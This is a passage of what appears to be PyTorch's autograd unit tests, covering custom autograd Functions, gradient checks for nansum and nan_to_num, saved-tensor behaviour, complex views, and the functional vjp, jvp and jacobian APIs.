original = torch._C.is_grad_enabled()
with torch.enable_grad():
self.assertTrue(torch._C.is_grad_enabled())
foo = torch.rand(go.size(), requires_grad=True)
grad, = torch.autograd.grad(
foo ** 3, foo, grad_outputs=go
)
self.assertTrue(torch._C.is_grad_enabled())
self.assertTrue(torch._C.is_grad_enabled() == original)
return grad
inp = torch.rand(3, requires_grad=True)
# Case where original==False
MyFunction.apply(inp).sum().backward()
# Case where original==True
MyFunction.apply(inp).sum().backward(create_graph=True)
def test_power_function(self):
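# For a zero base (tensor or Python scalar), the gradient wrt the exponent is expected to be
# -inf for a negative exponent and 0 otherwise.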
a = torch.tensor([0., 0., 0.])
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(a**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
s = 0
b = torch.tensor([-1., 0., 1.], requires_grad=True)
c = torch.sum(s**b)
c.backward()
self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.]))
def test_nansum_with_nans(self):
a = torch.randn(2, 2, 2, 2, dtype=torch.double)
with torch.no_grad():
a[a < 0.2] = float('nan')
a.requires_grad = True
# No args
gradcheck(lambda x: x.nansum(), a)
gradgradcheck(lambda x: x.nansum(), a)
# Single dim
gradcheck(lambda x: x.nansum((0)), a)
gradgradcheck(lambda x: x.nansum((0)), a)
# Multi dim
gradcheck(lambda x: x.nansum((0, 2)), a)
gradgradcheck(lambda x: x.nansum((0, 2)), a)
gradcheck(lambda x: x.nansum((0, -1)), a)
gradgradcheck(lambda x: x.nansum((0, -1)), a)
# With keep-dim
gradcheck(lambda x: x.nansum((0, -1), True), a)
gradgradcheck(lambda x: x.nansum((0, -1), True), a)
def test_nansum_dtype(self):
inp = torch.randn(2, 2, 2, 2)
with torch.no_grad():
inp[inp < 0.2] = float('nan')
def test(inp, inp_dtype, out_dtype):
with torch.no_grad():
a = inp.to(inp_dtype)
a.requires_grad = True
b = torch.nansum(a, dtype=out_dtype)
b.backward()
self.assertEqual(a.dtype, a.grad.dtype)
test(inp, torch.float, torch.double)
test(inp, torch.double, torch.float)
def test_nan_to_num(self):
a = torch.randn(3, 3, 3, 3, dtype=torch.double)
with torch.no_grad():
a[torch.rand_like(a) < 0.2] = float('nan')
a[torch.rand_like(a) < 0.2] = float('inf')
a[torch.rand_like(a) < 0.2] = -float('inf')
a.requires_grad = True
gradcheck(lambda x: x.nan_to_num(), a)
gradgradcheck(lambda x: x.nan_to_num(), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a)
gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a)
gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a)
def test_custom_function_error(self):
class BadFw(Function):
@staticmethod
def backward(ctx, foo):
return foo
class BadBw(Function):
@staticmethod
def forward(ctx, foo):
return foo.clone()
inp = torch.rand(1, requires_grad=True)
with self.assertRaisesRegex(NotImplementedError, "must implement the forward"):
BadFw.apply(inp)
with self.assertRaisesRegex(RuntimeError, "must implement the backward"):
BadBw.apply(inp).sum().backward()
def test_custom_function_local_inplace(self):
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, inp, inplace):
view = inp.clone()[:3]
if inplace:
view += 2
return view
@staticmethod
def backward(ctx, grad):
return grad, None
base = torch.rand(10, requires_grad=True)
foo = MyFn.apply(base, False)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
foo = MyFn.apply(base, True)
self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
inp = torch.rand(4, requires_grad=True)
out = inp.argmax()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argmin()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
out = inp.argsort()
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.rand((), requires_grad=True)
out = torch.searchsorted(inp, val)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
vals = torch.rand(5, 5, requires_grad=True)
out = torch.bucketize(vals, bins)
self.assertFalse(out.dtype.is_floating_point)
self.assertFalse(out.requires_grad)
val = torch.empty(5).requires_grad_()
out = val.count_nonzero()
self.assertFalse(out.requires_grad)
def assert_only_first_requires_grad(res):
if not isinstance(res, tuple):
res = (res,)
self.assertTrue(res[0].requires_grad)
for out in res[1:]:
if out is not None:
self.assertFalse(out.requires_grad)
for sort in [True, False]:
for return_inverse in [True, False]:
for return_counts in [True, False]:
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
res = torch.unique_consecutive(inp, return_inverse=return_inverse,
return_counts=return_counts, dim=0)
assert_only_first_requires_grad(res)
# Here we test the internal functions to make sure all of them are
# covered on top of the public API
res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
assert_only_first_requires_grad(res)
# This looks public but is actually manually deleted from the
# torch namespace in torch/functional.py
res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
# We don't test `unique_dim_consecutive` here.
# It looks public but the python binding is actually manually disabled in
# tools/autograd/gen_python_functions.py
res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
return_counts=return_counts)
assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
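# `out` is kept alive by a reference cycle (out -> grad_fn -> ctx.meta -> out); once external
# references are dropped it should only be freed by gc.collect(), with or without a prior backward.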
class MyFn(Function):
@staticmethod
def forward(ctx, x, metadata):
x = x.clone()
ctx.meta = metadata
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
self.assertEqual(x, 3.14)
self.assertEqual(ctx.meta["foo"], 3.14)
return gO * x, None
def get_refs(with_backward):
a = torch.tensor(3.14, requires_grad=True)
metadata = {}
out = MyFn.apply(a, metadata)
metadata["foo"] = out
if with_backward:
out.sum().backward()
self.assertEqual(a.grad, a)
return torch._C._WeakTensorRef(out)
with disable_gc():
ref = get_refs(False)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
# The backward clears the saved_variables but not the __dict__
with disable_gc():
ref = get_refs(True)
self.assertFalse(ref.expired())
gc.collect()
self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
leaf = torch.rand(2, 2, requires_grad=True)
# An op that returns sparse gradients
ind = torch.tensor([[0, 0]], dtype=torch.long)
out2 = leaf.gather(0, ind, sparse_grad=True)
# An op that returns the gradients as-is
out1 = leaf.clone()
grad_out1_original = torch.rand_like(out1)
grad_out1 = grad_out1_original.clone()
grad_out2 = torch.rand_like(out2)
torch.autograd.backward((out1, out2), (grad_out1, grad_out2))
# Given gradients should not be modified inplace
self.assertEqual(grad_out1, grad_out1_original)
def test_no_unnecessary_unwrapping(self):
a = torch.randn(5, requires_grad=True)
a_orig = a.detach().clone()
b = a * a
c = a * b
d = torch.exp(a)
# a is leaf
self.assertIs(b.grad_fn._saved_self, a)
self.assertIs(b.grad_fn._saved_other, a)
self.assertIs(c.grad_fn._saved_self, a)
# b is not an output
self.assertIs(c.grad_fn._saved_other, b)
# d is an output
self.assertEqual(d.grad_fn._saved_result, d)
self.assertIsNot(d.grad_fn._saved_result, d)
c.sum().backward()
with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
c.grad_fn._saved_self
# a is left untouched
self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
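# The unpacked saved result should share its version counter with `b`, so an in-place update
# under no_grad is reflected in both.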
a = torch.rand(2, requires_grad=True)
b = torch.exp(a)
b_unpacked = b.grad_fn._saved_result
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
with torch.no_grad():
b += 1
self.assertEqual(b, b_unpacked)
self.assertEqual(b._version, b_unpacked._version)
def index_perm_variable(shape, max_indices):
if not isinstance(shape, tuple):
shape = (shape,)
index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape)
return index
def bernoulli_scalar():
return torch.tensor(0, dtype=torch.uint8).bernoulli_()
def gradgradcheck_method_precision_override(test_name):
# these are just empirical observations; we should improve them
gradgradcheck_precision_override = {
'test_norm': {'atol': 2e-2, 'rtol': 1e-2},
'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2},
'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist': {'atol': 5e-2, 'rtol': 1e-2},
'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2},
}
non_broadcasted_test_name = test_name.split("_broadcast")[0]
override = gradgradcheck_precision_override.get(non_broadcasted_test_name)
if override:
if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name:
# errors accumulated across 1 dimension
override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S}
elif 'broadcast_all' in test_name:
# errors accumulated across multiple dimensions
override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S}
return override
def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable,
input_variables, run_gradgradcheck=True, check_batched_grad=True,
check_forward_ad=False):
test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION,
check_batched_grad=check_batched_grad, check_forward_ad=check_forward_ad))
gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name)
if gradgradcheck_precision_override is not None:
atol = gradgradcheck_precision_override['atol']
rtol = gradgradcheck_precision_override['rtol']
test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
else:
test_case.assertTrue(gradgradcheck(apply_method, input_variables,
gen_non_contig_grad_outputs=True,
check_batched_grad=check_batched_grad))
def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks,
f_args_variable, f_args_tensor, *, check_forward_ad=False):
output_variable = apply_fn(*f_args_variable)
if run_grad_checks:
run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn,
output_variable, f_args_variable, check_forward_ad=check_forward_ad)
self_variable = f_args_variable[0]
if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None:
output_variable.backward(randn_like(output_variable))
test_case.assertEqualTypeString(self_variable, self_variable.grad)
test_case.assertEqual(self_variable.size(), self_variable.grad.size())
class TestAutogradComplex(TestCase):
def test_view_func_for_complex_views(self):
# case 1: both parent and child have view_func
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
x0 = x.clone()
x1 = torch.view_as_complex(x0)
x2 = torch.view_as_real(x1)
x2.mul_(2)
x2.sum().backward()
y0 = y.clone()
y0.mul_(2)
y0.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 2: parent has view_func but child does not
x = torch.randn(2, 2, 2, dtype=torch.double, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a):
b = a.clone()
b1 = torch.view_as_complex(b)
b2 = b1.reshape(b1.numel())
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
# case 3: parent does not have a view_func but child does
x = torch.randn(10, dtype=torch.cdouble, requires_grad=True)
y = x.detach().requires_grad_(True)
def fn(a, dim0_size=5):
b = a.clone()
b1 = b.reshape(dim0_size, 2)
b2 = torch.view_as_real(b1)
return b2
x0 = fn(x)
x0.mul_(2)
x0.sum().backward()
y0 = fn(y)
y1 = y0.mul(2)
y1.sum().backward()
self.assertEqual(x.grad, y.grad)
def test_view_with_multi_output(self):
x = torch.randn(2, 2, 2, dtype=torch.double)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
x.requires_grad_(True)
x1 = torch.view_as_complex(x)
# Taking an invalid view should always be allowed as long as it is not
# modified inplace
res = x1.unbind(0)
with self.assertRaisesRegex(RuntimeError, "output of a function that returns multiple views"):
res[0] += torch.rand(2, requires_grad=True)
def as_identity(self):
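# Note: this helper is not prefixed with `test_`, so the default test runner does not collect it.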
# view_as_real and view_as_complex behavior should be like an identity
def func(z):
z_ = torch.view_as_complex(z)
z_select = torch.select(z_, z_.dim() - 1, 0)
z_select_real = torch.view_as_real(z_select)
return z_select_real.sum()
z = torch.randn(10, 2, 2, dtype=torch.double, requires_grad=True)
gradcheck(func, [z])
func(z).backward()
z1 = z.clone().detach().requires_grad_(True)
torch.select(z1, z1.dim() - 2, 0).sum().backward()
self.assertEqual(z.grad, z1.grad)
class TestAutogradFunctional(TestCase):
def _assert_same_struct(self, res, base):
# base and res should be Tensors or tuples of Tensors with the same size
if isinstance(base, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(base.size(), res.size())
elif isinstance(base, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(base), len(res))
for el_base, el_res in zip(base, res):
self.assertTrue(isinstance(el_base, torch.Tensor))
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertEqual(el_base.size(), el_res.size())
else:
# Wrong base
raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
" the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
def test_vjp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.ones(3)
with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
res = autogradF.vjp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
res = autogradF.vjp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
res = autogradF.vjp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.vjp(foo, inp, v[:2])
res = autogradF.vjp(foo, inp, v)[1]
self._assert_same_struct(res, inp)
def test_vjp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.vjp(foo, inp, v, strict=True)
res = autogradF.vjp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.vjp(bar, inp, v, strict=True)
res = autogradF.vjp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_vjp_no_grad(self):
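# vjp should still compute results under no_grad, and create_graph=True should build a graph
# even inside the no_grad block.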
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_vjp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4)
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[1], inputs)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = torch.ones(2)
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out.grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, vjp_val = autogradF.vjp(adder, inputs, v)
self._assert_same_struct(vjp_val, inputs)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(vjp_val[0].grad_fn)
self.assertIsNone(vjp_val[1].grad_fn)
def test_vjp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones([])
res = autogradF.vjp(reducer, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
res = autogradF.vjp(reducer, inputs)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones(4)
res = autogradF.vjp(expander, inputs, v)
self._assert_same_struct(res[0], v)
self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def test_jvp_err_check(self):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
res = autogradF.jvp(foo, (inp, 2), v)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
res = autogradF.jvp(bar, inp, v)
with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
res = autogradF.jvp(foo, inp)
with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
res = autogradF.jvp(foo, inp, (v, v))
with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
res = autogradF.jvp(foo, inp, v[:2])
res = autogradF.jvp(foo, inp, v)[1]
self._assert_same_struct(res, foo(inp))
def test_jvp_err_check_strict(self):
def foo(a):
return a.detach()
def bar(a):
# Make a non-leaf Tensor that requires_grad but that is not connected to the input
return a.long().float().requires_grad_().clone()
inp = torch.rand(4)
v = torch.rand(4)
with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
res = autogradF.jvp(foo, inp, v, strict=True)
res = autogradF.jvp(foo, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
res = autogradF.jvp(bar, inp, v, strict=True)
res = autogradF.jvp(bar, inp, v, strict=False)
self._assert_same_struct(res[1], res[0])
self.assertEqual(res[1].abs().sum(), 0.)
# The Jacobian does not depend on the input
def foo(a):
return a.clone()
inp.requires_grad_()
with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True)
res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False)
self._assert_same_struct(res[1], inp)
self.assertEqual(res[1], v)
def test_jvp_no_grad(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v)
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
inputs.requires_grad_()
v.requires_grad_()
with torch.no_grad():
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
self.assertNotEqual(res[1], torch.zeros(4, 4))
def test_jvp_output(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[1], res[0])
self.assertIsNone(res[0].grad_fn)
self.assertIsNone(res[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.ones(2), torch.ones(2))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out.grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def adder(x, y):
return 2 * x + 3 * y, x + y
inputs = (torch.rand(2), torch.rand(2))
v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
out, jvp_val = autogradF.jvp(adder, inputs, v)
self._assert_same_struct(jvp_val, out)
self.assertIsNone(out[0].grad_fn)
self.assertIsNone(out[1].grad_fn)
self.assertIsNone(jvp_val[0].grad_fn)
self.assertIsNone(jvp_val[1].grad_fn)
def test_jvp_scalar(self):
def reducer(x):
return x.sum()
inputs = torch.rand(4, 4)
v = torch.ones(4, 4)
res = autogradF.jvp(reducer, inputs, v)
self._assert_same_struct(res[0], torch.zeros([]))
self._assert_same_struct(res[1], res[0])
def expander(x):
return x.unsqueeze(0).repeat(4)
inputs = torch.rand([])
v = torch.ones([])
res = autogradF.jvp(expander, inputs, v)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
res = autogradF.jvp(expander, inputs)
self._assert_same_struct(res[0], torch.zeros(4))
self._assert_same_struct(res[1], res[0])
def test_jvp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, 2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.jvp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], res[0])
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
def _test_construct_standard_basis_for(self, inputs):
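        # Descriptive note: _construct_standard_basis_for is the internal helper that
        # (presumably) backs the vectorize=True code paths. For each input it returns
        # that input's slice of columns of the overall identity matrix, in the input's
        # dtype and device; concatenated along dim=1 they should reproduce
        # torch.eye(sum(numels)), which is exactly what this check asserts.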
numels = tuple(tensor.numel() for tensor in inputs)
results = autogradF._construct_standard_basis_for(inputs, numels)
for result, inp in zip(results, inputs):
self.assertEqual(result.dtype, inp.dtype)
self.assertEqual(result.device, inp.device)
results = torch.cat([result.to(device='cpu', dtype=torch.float)
for result in results], dim=1)
expected = torch.eye(results[0].shape[0], dtype=torch.float)
self.assertEqual(results, expected)
def test_construct_standard_basis_for(self):
test_cases = [
(torch.randn(2, 3),),
(torch.randn(1),),
(torch.randn([]),),
(torch.randn(1), torch.randn([]), torch.randn([])),
(torch.randn(2), torch.randn(3), torch.randn([])),
(torch.randn(2), torch.randn([]), torch.randn(3)),
(torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
(torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
@unittest.skipIf(not TEST_CUDA, "test requires CUDA")
def test_construct_standard_basis_for_cuda(self):
test_cases = [
(torch.randn(2), torch.randn(3, device='cuda')),
(torch.randn(3, device='cuda'), torch.randn(2)),
]
for inputs in test_cases:
self._test_construct_standard_basis_for(inputs)
def _test_vectorize_raises_no_warnings(self, api):
        # vmap is an experimental prototype: calling torch.vmap raises a Python
        # warning. This test checks that autogradF.{jacobian, hessian} do not
        # surface that experimental-prototype warning; a public-facing API should
        # not emit it, no matter how it is called.
def foo(a):
return (a ** 2).sum()
x = torch.randn(3)
with warnings.catch_warnings(record=True) as wa:
result = api(foo, x, vectorize=True)
self.assertEqual(len(wa), 0)
def test_jacobian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.jacobian)
def test_hessian_vectorize_raises_no_warnings(self):
return self._test_vectorize_raises_no_warnings(autogradF.hessian)
def _test_jacobian_err_check(self, vectorize):
def foo(a):
return 3 * a.narrow(0, 0, 3)
def bar(a):
return 3 * a.narrow(0, 0, 3), "bar"
inp = torch.rand(4)
with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)
with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
res = autogradF.jacobian(bar, inp, vectorize=vectorize)
res = autogradF.jacobian(foo, inp, vectorize=vectorize)
